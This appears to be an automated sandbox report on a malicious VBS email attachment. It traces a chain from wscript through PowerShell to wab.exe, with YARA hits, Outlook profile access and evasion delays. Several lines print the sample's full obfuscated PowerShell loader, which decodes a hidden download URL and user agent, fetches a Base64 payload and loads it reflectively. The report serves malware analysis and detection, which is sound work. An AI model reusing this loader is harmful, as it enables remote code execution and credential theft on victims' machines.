nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. 
ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$
            Source: Swift_Message#1234323456.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi64_416.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_3428.amsi.csv, type: OTHER, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 416, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3428, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engine, Classification label: mal100.troj.spyw.expl.evad.winVBS@12/7@4/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\Amarantfarvers.Bip
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, Mutant created: NULL
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upctm0t2.0yj.ps1
            Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=416
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3428
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exe, File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb| source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2679909580.000000000776C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb>vkv source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 00000005.00000002.2679909580.00000000077AD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb' source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32 source: powershell.exe, 00000005.00000002.2679909580.00000000077AD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2673226502.0000000003340000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate(", "0")
            Source: Yara match File source: 0000000B.00000002.3597768413.0000000004720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2686037167.0000000009DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2685556300.0000000008A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2677071576.0000000005FE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2841439577.0000015930831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Reevidence)$global:Dyreparken = [System.Text.Encoding]::ASCII.GetString($Adrenalectomy)$global:Rutted172=$Dyreparken.substring(294928,26987)<#Improvisatorer Excerpting Megaptera Blin
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Foisting $Quests $Ankenvnenes), (Kraftfuldheds @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Arrimby = [AppDomain]::CurrentDomain.GetAssemblies()$global:
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Filliped122)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Gorillaens, $false).DefineType($Steamvortex,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Reevidence)$global:Dyreparken = [System.Text.Encoding]::ASCII.GetString($Adrenalectomy)$global:Rutted172=$Dyreparken.substring(294928,26987)<#Improvisatorer Excerpting Megaptera Blin
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. 
ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. 
ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD343D00BD pushad ; iretd 2_2_00007FFD343D00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD344A71C8 push esp; retf 2_2_00007FFD344A71C9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07A10638 push eax; mov dword ptr [esp], ecx 5_2_07A10AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_086E3A9C push ebx; retf 5_2_086E3ADA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_086E2B31 push ebx; ret 5_2_086E2B32
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092F4B09 push ebx; retf 5_2_092F4B11
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092F1D7A push eax; iretd 5_2_092F1D81
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092F11A4 push eax; iretd 5_2_092F11A5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092F27EF push eax; iretd 5_2_092F27F5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092F2BD2 push eax; retf 5_2_092F2BD5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092F3438 push es; retf 5_2_092F3439
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092F100F push ebp; retf 5_2_092F1015
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092F4A10 push esp; ret 5_2_092F4AA1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092F386F push ebp; retf 5_2_092F3871
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092F4A64 push esp; ret 5_2_092F4AA1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092F0660 push 7677562Fh; retf 5_2_092F0671
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_092F06BC pushfd ; retf 5_2_092F06ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_027C0CB5 push edi; ret 11_2_027C0CC2
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_03C62BD2 push eax; retf 11_2_03C62BD5
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_03C64B09 push ebx; retf 11_2_03C64B11
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_03C64A64 push esp; ret 11_2_03C64AA1
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_03C64A10 push esp; ret 11_2_03C64AA1
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_03C611A4 push eax; iretd 11_2_03C611A5
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_03C6386F push ebp; retf 11_2_03C63871
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_03C6100F push ebp; retf 11_2_03C61015
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_03C627EF push eax; iretd 11_2_03C627F5
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_03C606BC pushfd ; retf 11_2_03C606ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_03C60660 push 7677562Fh; retf 11_2_03C60671
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_03C61D7A push eax; iretd 11_2_03C61D81
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_03C63438 push es; retf 11_2_03C63439
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_24CAE8DB push ss; ret 11_2_24CAE8DE
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 27C0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 21F30000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 23F30000 memory reserve | memory write watch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 1200000
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 1199871
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 1199765
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4976
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4945
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5902
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3860
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3920
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5908
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99657Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99532Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99282Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99157Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99032Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98922Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98813Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98563Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98438Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98217Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97996Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97670Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97558Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97343Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99782Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99422Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99181Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99079Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98966Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98846Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98484Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98375Jump to behavior
